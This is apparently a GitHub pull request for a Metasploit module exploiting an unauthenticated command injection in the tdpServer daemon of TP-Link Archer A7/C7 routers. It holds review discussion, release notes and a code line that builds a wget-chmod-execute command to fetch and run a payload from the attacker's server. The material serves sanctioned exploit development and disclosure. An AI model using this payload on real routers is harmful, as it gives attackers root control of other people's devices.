Archer a7 c7 lan #13208
Archer a7 c7 lan #13208
Conversation
| @payload_exe = generate_payload_exe | ||
|
|
||
| # Command that will download @payload_exe and execute it | ||
| download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}" |
There was a problem hiding this comment.
as per below, it can be http or https, so we need to add something like it is below:
"wget #{(datastore['SSL'] ? 'https' : 'http')}://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"There was a problem hiding this comment.
Actually the wget busybox version on the target doesn't support https connections so the SSL option in the module had to be removed completely.
Busybox wget on the target doesn't support https connections.
|
ok all done, I'll send the pcap now to your email |
|
tplink_archer_a7_c7_lan_rce.pcap.zip |
|
Please hold on on this, we just found a way to optimise the exploit |
|
Ok, all done, this is ready for final review and merge! We tested all scenarios, and the pcap shows a successful attempt. This was before the refactoring, but we didn't change any functionality, just removed dead code. |
Release NotesA new module, This module exploits CVE's: |
This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host.
This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro @pedrib + Radek Domanski @rdomanski).